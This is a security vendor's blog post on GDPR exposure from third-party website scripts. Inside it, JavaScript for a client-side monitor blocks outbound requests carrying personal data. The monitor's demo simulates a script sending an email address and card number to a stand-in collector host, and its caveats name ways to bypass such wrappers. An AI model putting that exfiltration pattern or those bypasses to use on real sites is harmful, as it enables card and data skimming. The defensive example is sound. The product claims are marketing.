GDPR and Website Data Leakage: A Complex Problem with a Simple Solution

By Source Defense

Now in its fourth year, the European Union's General Data Protection Regulation (GDPR) is one of the strictest, most complex and most confusing data privacy laws in the world. That complexity meant enforcement got off to a slow start, but GDPR fines are now becoming more common and more costly.

Over the past 12-18 months, some of the biggest brands in the world have suffered some of the toughest fines under GDPR:

  • Amazon – $824 million
  • WhatsApp – $224 million
  • Google Ireland – $99 million
  • Google – $66 million
  • Facebook – $66 million
  • H&M – $39 million
  • British Airways – $26 million

Many businesses remain confused about what the GDPR requires of them. The GDPR applies whenever personal data is processed, and personal data is defined broadly as any information relating to an identified or identifiable natural person (Article 4(1)). An email address, an IP address, a tracking cookie, an identification number or any other "online identifier" is therefore almost always personal data. Even a hashed or encrypted email address is usually personal data, because it is still a unique identifier that can be linked back to a person.

There is a natural tension between the letter of the law and business models that rely on customer data to improve the customer experience and drive revenue. The GDPR has been criticized for being too vague and difficult to interpret, especially for the digital and marketing professionals on the front lines of digital business. The result has been uncertainty about which security and privacy protections to put in place, which often leads to little or no action on GDPR controls at all.

One thing is certain, however: there is a real and material risk of non-compliance with the GDPR stemming from the digital supply chain of third parties on your websites.

Understand and deal with risk

Here's what we know about the compliance risk posed by third- and fourth-party partners in your digital supply chain. Your websites probably include a dozen or more partners whose code is served (with your permission) to every visitor and executed directly in their browser. As the website owner, you have a duty to ensure that all data collected complies with data privacy requirements and is protected from breaches. Yet you have limited or no visibility into what that partner code actually does, for several reasons. First, the code changes at a breakneck pace, potentially thousands of times a year. Second, it is often dynamic: it changes on the fly based on how visitors interact with your site. And, most likely, you have no tooling in place to monitor that code, secure it, or enforce compliance policies on it.

This creates a gap in compliance assurance that could cost you dearly. Recent research by Source Defense and others has revealed that, in the normal course of their operations, many of these partner scripts capture data without consent and, in some cases, transmit it to their own servers. The recent case of Meta described in this blog post is one example. In other words, you can be exposed to potentially massive GDPR and data privacy fines simply by going about your normal day-to-day operations.

The problem becomes even more pronounced when you consider the risk of a security breach. Third- and fourth-party scripts greatly increase your client-side attack surface, because the browser security model grants every script that runs in a page the same level of control, whichever server it was loaded from: a partner's tag can read form fields, cookies and page content exactly as your own code can.

Web application logic, a combination of your own application code and integrated third-party content and functionality, is loaded and executed client-side in the browser, beyond the reach of server-side security controls. Because that code is downloaded dynamically from remote servers, it bypasses traditional security infrastructure, including website firewalls and web application firewalls, which only inspect traffic to and from your own servers and never see a request a script sends from the visitor's browser to someone else's. This weakness is easily exploited, and attacks using this vector occur in the hundreds every day. A successful attack brings not only brand damage, significant incident response costs and potential class action lawsuits, but also the potential for data privacy fines such as the one British Airways received.

Source Defense offers a simple, easy-to-use solution to the problem that benefits business stakeholders, security, and your governance, risk, and compliance efforts.

Source Defense's sandboxing capability isolates all third-party JavaScript from the web page in real time. It relies on a set of fully automated, machine-learning-assisted policies that control access and permissions for every third-party tool operating on a website (including the fourth and fifth parties those tools link in). If a script's activity falls outside what it is allowed to do, Source Defense keeps it isolated from the user's activity (thwarting an attack, or stopping a data privacy or compliance breach) and sends a report alerting your teams to the third-party script that violated its privacy, compliance or security policy.
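As an added example that is not from the original post and not Source Defense's product code, the block below shows a minimal version of the client-side control the two passages above describe: any script in the page can call fetch() or navigator.sendBeacon() to ship form contents off to a server of its choosing, and nothing server-side will see it; a monitor installed before the partner tags load wraps those two APIs, checks every outbound call against an allowlist of destination origins, scans the payload for obvious personal data, and reports and blocks the violation. The policy, the origins, the field names and the checkout payload are all constructed for the example; the hypothetical helper names are mine.

```javascript
// Added example (not Source Defense's code). Constructed policy: which
// destination origins may receive any traffic at all, and which subset may
// receive personal data. All origins here are assumptions for the example.
const POLICY = {
  allowedOrigins: new Set([
    "https://www.example-shop.test",      // first party
    "https://tagmanager.partner.test",    // approved third-party tag
  ]),
  personalDataOrigins: new Set(["https://www.example-shop.test"]),
};

// Crude personal-data detectors: an e-mail address and a Luhn-valid card
// number in a serialized request body. Enough to show the idea, not a DLP engine.
const EMAIL_RE = /[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}/;
const PAN_CANDIDATE_RE = /\b(?:\d[ -]?){13,19}\b/g;

function luhnValid(digits) {
  let sum = 0;
  let dbl = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = Number(digits[i]);
    if (dbl) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    dbl = !dbl;
  }
  return digits.length >= 13 && sum % 10 === 0;
}

function findPersonalData(body) {
  const text = body == null ? "" : String(body);
  const findings = [];
  if (EMAIL_RE.test(text)) findings.push("email");
  for (const m of text.match(PAN_CANDIDATE_RE) || []) {
    if (luhnValid(m.replace(/[ -]/g, ""))) { findings.push("card-number"); break; }
  }
  return findings;
}

// Decide whether one outbound request may proceed under the policy.
function evaluateRequest(url, body, policy = POLICY) {
  let origin;
  try { origin = new URL(url).origin; } catch (e) { origin = "invalid"; }
  const reasons = [];
  if (!policy.allowedOrigins.has(origin)) {
    reasons.push(`destination ${origin} is not allowlisted`);
  }
  const pii = findPersonalData(body);
  if (pii.length && !policy.personalDataOrigins.has(origin)) {
    reasons.push(`payload contains ${pii.join(", ")} bound for an origin not approved for personal data`);
  }
  return { origin, personalData: pii, allowed: reasons.length === 0, reasons };
}

// Install the hooks on a window-like object. `report` receives each violation.
// In a real page this must run before any third-party tag is loaded.
function installOutboundMonitor(target, report, policy = POLICY) {
  const originalFetch = target.fetch;
  target.fetch = function (input, init = {}) {
    const url = typeof input === "string" ? input : input.url;
    const verdict = evaluateRequest(url, init.body, policy);
    if (!verdict.allowed) {
      report({ api: "fetch", url, ...verdict });
      return Promise.reject(new Error("blocked by client-side policy"));
    }
    return originalFetch.call(target, input, init);
  };
  if (target.navigator && typeof target.navigator.sendBeacon === "function") {
    const originalBeacon = target.navigator.sendBeacon;
    target.navigator.sendBeacon = function (url, data) {
      const verdict = evaluateRequest(url, data, policy);
      if (!verdict.allowed) {
        report({ api: "sendBeacon", url, ...verdict });
        return false; // same signal the browser gives when a beacon is not queued
      }
      return originalBeacon.call(target.navigator, url, data);
    };
  }
}

// Stand-alone demo with a constructed window object: a partner "tag" script
// tries to post the checkout form's contents to an origin the site owner
// never approved, while an approved tag sends a harmless page-view beacon.
function demo() {
  const sent = [];
  const violations = [];
  const fakeWindow = {
    fetch: (input, init) => { sent.push({ url: input, init }); return Promise.resolve({ ok: true }); },
    navigator: { sendBeacon: (url, data) => { sent.push({ url, data }); return true; } },
  };
  installOutboundMonitor(fakeWindow, (v) => violations.push(v));
  // Constructed checkout payload (test card number 4111 1111 1111 1111).
  const checkout = JSON.stringify({ email: "alice@example.test", card: "4111 1111 1111 1111" });
  fakeWindow.fetch("https://collector.unknown.test/c", { method: "POST", body: checkout }).catch(() => {});
  fakeWindow.navigator.sendBeacon("https://tagmanager.partner.test/ping", "event=pageview");
  return { sent, violations };
}
```

Two caveats a practitioner should keep in mind. First, a wrapper like this is itself ordinary JavaScript in the same page: a script that loaded before it, or that reaches the pristine API through a freshly created iframe, can bypass it, and it only covers the two APIs it wraps (image beacons, WebSockets and form submissions are untouched). That is exactly why the text above talks about isolating third-party code rather than merely watching it. Second, the detectors here are deliberately simple; real payloads are often base64- or URL-encoded, so a production control has to decode before it scans.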

It's as close to assured data security and privacy as you'll find in the market. And it's a solution that takes the security and GRC burden out of business decision-making.

Adopting Source Defense client-side security isn't the proposition you're used to: it doesn't require a lengthy proof of concept, major downtime for installation and tuning, or a team of new hires to manage it. It's simple, efficient and immediately beneficial, uniting business, security and GRC units under a single risk management umbrella that protects the organization from harm.
Request a demo to learn how Source Defense can help you mitigate significant risk to your organization, keep your partners within policy, and defend your business against client-side attacks.

The post GDPR and Website Data Leakage: A Complex Problem with a Simple Solution appeared first on Source Defense.

*** This is a Security Bloggers Network syndicated blog from Blog – Source Defense, written by [email protected]. Read the original post at:

Sherry J. Basler